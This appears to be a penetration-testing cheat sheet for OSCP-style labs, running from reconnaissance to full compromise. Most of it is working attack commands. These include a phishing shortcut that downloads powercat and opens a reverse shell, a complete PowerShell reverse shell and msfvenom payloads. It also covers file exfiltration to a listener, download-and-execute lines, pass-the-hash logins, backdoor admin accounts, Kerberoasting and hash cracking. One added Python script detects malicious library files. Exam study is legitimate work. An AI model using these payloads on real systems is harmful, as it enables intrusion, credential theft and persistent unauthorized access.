Beginning

Capture Everything:

Windows:

whoami && ipconfig && type proof.txt

Linux:

whoami && ifconfig && cat proof.txt

  1. Make Directories

  2. Nmap Scan -Pn

nmap -Pn ip_address

Other method:

nmap -n -v -sT -A  192.168.1.249

  3. Run nmapAutomator Script to automate enum:

/usr/local/bin/nmapAutomator.sh -H 192.168.1.1 -t All

Link: https://github.com/21y4d/nmapAutomator

Or run AutoRecon (with sudo privileges):

python3 -m pip install -r ../AutoRecon-main/requirements.txt --break-system-packages

Link: https://github.com/Tib3rius/AutoRecon

  4. Nmap detailed with Service Scan

We'll use -sV to enable service and version detection as well as -sC to use Nmap's default scripts. In addition, we'll pass -oN to write the scan results to an output file.

sudo nmap -sC -sV -oN nmap_results.txt 192.168.247.242

  5. If an HTTP service is found, run GoBuster basics

gobuster dir -u http://192.168.247.242 -w /usr/share/wordlists/dirb/common.txt -o gobuster_results -x txt,pdf,config

Others:

gobuster dir -u http://192.168.214.249:8000/  -w /usr/share/wordlists/dirb/common.txt -q -n -e

gobuster dir -u http://192.168.214.249:8000/cms/  -w /usr/share/wordlists/dirb/common.txt -q -n -e -b 302

Or use this:

python3 dirsearch.py -u http://example.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

Alternative wordlists:

directory-list-2.3-medium.txt
directory-list-2.3-big.txt

  6. If you have the version of a service (or even if not), use exploitdb or searchsploit to check whether exploits are available.

searchsploit hmailserver

  7. If WordPress, use:

whatweb http://192.168.247.244

  8. Get WordPress plugin details:

wpscan --url http://192.168.247.244 --enumerate p --plugins-detection aggressive -o wpscan_results.txt

  9. Once you find any creds or useful information, add them to your list and keep going!

  10. Try different usernames and passwords using crackmapexec:

crackmapexec smb 192.168.247.242 -u usernames.txt -p passwords.txt --continue-on-success

Then check permissions:

crackmapexec smb 192.168.247.242 -u john -p "dqsXxXpZPn#nL" --shares

Login with local creds:

crackmapexec smb 192.168.173.96 -u administrator -p 'HULULaasd.?' --shares --local-auth

Phishing:

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/Downloads/lab/webdav

The victim opens the .lnk file in the home directory of the WebDAV share.

Create a shortcut (.lnk) file whose target is the command below:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.154:8000/powercat.ps1'); powercat -c 192.168.45.154 -p 4444 -e powershell"

And put this content on config.Library-ms:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.45.154</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
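From the defender's side, the tell-tale of a library file like the one above is a search-connector location that points at a remote host rather than a local known folder. The following Python check is an added example (not part of the original notes): it parses a .Library-ms document and flags such locations; the sample document, the 192.0.2.10 address and the known-folder entry are constructed for the test.

```python
import xml.etree.ElementTree as ET
from typing import List
from urllib.parse import urlparse

# Namespace used by Windows library description files (seen in the sample above).
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample mirroring the structure above; NOT a captured file.
# The second connector is a benign local known-folder entry for contrast.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.0.2.10</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def library_locations(xml_text: str) -> List[str]:
    """Return every <simpleLocation><url> value in a .Library-ms document."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [(u.text or "").strip()
            for u in root.findall(".//lib:simpleLocation/lib:url", NS)]


def suspicious_locations(xml_text: str) -> List[str]:
    """Locations that point at a network host (http/https URL or UNC path)
    instead of a local known folder or drive path. Heuristic chosen by the
    editor: a library file received by mail or WebDAV should never need one."""
    flagged = []
    for url in library_locations(xml_text):
        scheme = urlparse(url).scheme.lower()
        if scheme in ("http", "https") or url.startswith("\\\\"):
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    for loc in suspicious_locations(SAMPLE_LIBRARY_MS):
        print("remote library location:", loc)
```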

A few more helpful things:

cp /usr/share/peass/linpeas/linpeas.sh .
python3 -m http.server 80
sudo killall -9 python3
wget -O shell.sh http://192.168.45.154/linpeas.sh

Git Commands:

Use git_dumper to download the whole .git folder, then:

git log
git show 612ff5783dd5dbd1x0x008523dba83374a84aaf1
git commit 612ff5783dd5dbd1x0x008523dba83374a84aaf1

git checkout 612ff5783dd5dbd1x0x008523dba83374a84aaf1

Powershell reverse shell

powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Search for sensitive extensions:

dir /s /b /ah *.zip
Get-ChildItem -Path . -Recurse -Filter "proof.txt" -ErrorAction SilentlyContinue
Get-ChildItem -Path . -Recurse -Filter "local.txt" -ErrorAction SilentlyContinue

Before you do anything else, run:

whoami /priv

Move to a different user

meterpreter > execute -H -f cmd.exe -u "targetusername" -p "Password123"

Transferring Files

Download into Windows victim:

iwr -uri http://192.168.45.154:8000/SharpHound.ps1 -Outfile SharpHound.ps1
iwr -uri http://192.168.45.166/winPEASx64.exe -Outfile wpeas.exe
iwr -uri http://192.168.45.166/pspoof.exe -Outfile pspoof.exe
iwr -uri http://192.168.45.166/nc.exe -Outfile nc.exe
iwr -uri http://192.168.45.166/mimi.exe -Outfile mimi.exe
iwr -uri http://192.168.45.166/shell.exe -Outfile shell.exe
certutil.exe -urlcache -split -f http://192.168.45.166/shell.exe c:\users\public\shell.exe

Kerberoast (impacket from Kali via proxychains, or Rubeus on the victim):

proxychains -q /usr/share/doc/python3-impacket/examples/impacket-GetUserSPNs -request -dc-ip 192.168.50.70 oscp.exam
iwr -uri http://192.168.45.166/Rubeus.exe -Outfile rub.exe
.\rub.exe kerberoast /outfile:hashes.kerberoast

On kali:

nc -nlvp 9001 > received_file.txt

On Victim (Windows):

Note: give the exact full path to the file.

$client = New-Object System.Net.Sockets.TCPClient("<kali_ip>",9001);$stream = $client.GetStream();[byte[]]$bytes = [System.IO.File]::ReadAllBytes("C:\Path\To\File.txt");$stream.Write($bytes,0,$bytes.Length);$stream.Close();$client.Close()

On Victim (Linux):

nc <kali_ip> 9001 < /path/to/file.txt

Reverse Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=443 -f exe -o 2shell.exe

Then catch the session with netcat:

nc -lvnp 443

Or using Meterpreter (not allowed in OSCP)

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.45.221
set LPORT 443
set ExitOnSession false
run -j

Then setup SOCKS Proxy:

use multi/manage/autoroute
set session 1
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j

Ensure you edit /etc/proxychains4.conf manually so it points at the SOCKS proxy started above.

Using nmap to scan through the proxy:

sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254

Some more commands:

proxychains -q evil-winrm -i 10.10.143.148 -u support -p "Freedom1"

proxychains -q evil-winrm -i 10.10.143.148 -u web_svc -p "Diamond1" -d oscp.exam

proxychains -q evil-winrm -i 10.10.143.148 -u Mary.Williams -H 9a3121977ee93af56ebd0ef4f527a35e

proxychains -q evil-winrm -i 10.10.143.146 -u tom_admin -H 4979d69d4ca66955c075c41cf45f24dc
proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py MS02/[email protected]

proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py web_svc:[email protected]

proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py OSCP.exam/[email protected] -hashes 00000000000000000000000000000000:9a3121977ee93af56ebd0ef4f527a35e

proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py [email protected] -hashes 00000000000000000000000000000000:9a3121977ee93af56ebd0ef4f527a35e
proxychains -q /usr/share/doc/python3-impacket/examples/mssqlclient.py oscp.exam/web_svc:[email protected] -windows-auth
proxychains -q crackmapexec smb 10.10.143.148 -u users.txt -d oscp.exam -p password.txt --shares

proxychains -q crackmapexec smb 10.10.143.148 -u users.txt -d oscp.exam -p password.txt --continue-on-success

Get Windows System Info:

Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsArchitecture, WindowsBuildLabEx

Enable RDP Service

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
sc query termservice

Create new User and Add to Admin group:

net user hacker password /add
net localgroup Administrators hacker /add

Using Potatoes:

.\pspoof.exe -c "nc.exe 192.168.45.166 1337 -e cmd"
.\sp.exe "net user hacker password /add"

Connect to RDP:

xfreerdp /v:192.168.183.147 /u:hacker /p:password /drive:kali,/home/kali/shared

PowerUp:

certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"

Jaws Powershell PrivEsc Windows:

https://github.com/411Hall/JAWS/blob/master/jaws-enum.ps1
https://github.com/411Hall/JAWS
powershell IEX (New-Object Net.WebClient).downloadString('https://192.168.49.221/Jaws.ps1')
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename EnumOutput.txt

Enable SSH Service in Kali:

Enable and start the SSH service:

sudo systemctl enable ssh
sudo systemctl start ssh

Check if it’s running:

sudo systemctl status ssh

Then do a reverse tunnel back to kali:

ssh -N -R 1122 [email protected]

Switching to Root user if you have SU rights:

Install Python packages system-wide:

python3 -m pip install -r requirements.txt --break-system-packages   

Cracking NTLM Hashes:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT ntlm.hashes

// in case the cached results don't show up, use a fresh pot file
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT --pot=new.pot ntlm.hashes

RunAs Command:

runas /user:OSCP\eric.wallows cmd.exe

Quick Sharphound:

iwr -uri http://192.168.45.166/SharpHound.ps1 -Outfile sh.ps1
powershell -ep bypass

Import-Module .\sh.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory c:\users\public\ -OutputPrefix "corp audit" -ZipPassword MyPassword

Then on Kali, launch BloodHound:

/home/kali/Downloads/BloodHound-linux-x64/BloodHound --no-sandbox

Windows Quick Checks

strings admintool.exe | grep password
Get-ChildItem -Path "C:\Users\" -Recurse -Force -Filter "ConsoleHost_history.txt" -ErrorAction SilentlyContinue
